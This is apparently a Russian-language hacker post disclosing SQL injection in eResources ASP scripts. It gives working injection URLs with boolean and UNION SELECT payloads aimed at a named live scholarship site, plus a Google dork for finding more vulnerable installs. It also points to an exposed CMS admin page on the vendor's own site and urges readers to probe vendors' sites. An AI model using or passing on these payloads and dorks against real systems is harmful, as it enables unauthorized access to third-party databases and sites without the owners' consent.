SQL-injection в eResources Online Application System
 

Продукция компании eResources представляет собой asp скрипты, которые почему-то никто не любит и не рассматривает. По большей части у eResources они дырявые.

SQL - injections присутствует в переменных subsectionID и PageID:
_http://scholarships.hispanicfund.org/applications/subsectionID.1,pageID.126%20and(1=1)--/default.asp
_http://scholarships.hispanicfund.org/applications/subsectionID.199999+union+select+null,4--,pageID.126/default.asp

Google tip:
Powered By eResources inurl:pageID


Скажу сразу - я проверил и в сотальных продуктах данной компании багов не меньше. Более того, по традиции, начатой мной в сегодняшней статье, я заглянул на сайт разработчиков и поробовал поискать баги на нем (всегда советую Вам так делать, т. к. 60% дырявый скрипт присутствует на сайте создателя, а зесли не присутствует, значит создатели знают, что их продукция безбожно бажная и отказываюся от нее, что тоже приводит к плохим последствиям).
Так вот.

_http://www.eresources.com/robots.txt
вывел мне
User-agent: *
Disallow: /admin
Disallow: /doclib
Disallow: /include
Disallow: /imglib
Disallow: /scripts
Disallow: /zER_backup
Disallow: /zER_CMS

А запрос:
_http://www.eresources.com/zER%5FCMS/section_add.asp
предложил мне побаловаьтся, но так как я не счел это нужным, то и трогать не стал:

CMS Mini Powerful Tool
переходим в Add и таму нас формочка, заносящая вводимые данные в базу. Чем это чревато, я думаю, понятно.

CMS ADMINISTRATION PAGE
(To be used by eResources Staff Only)
Только для staff!!! Поэтому я трогать не стал. )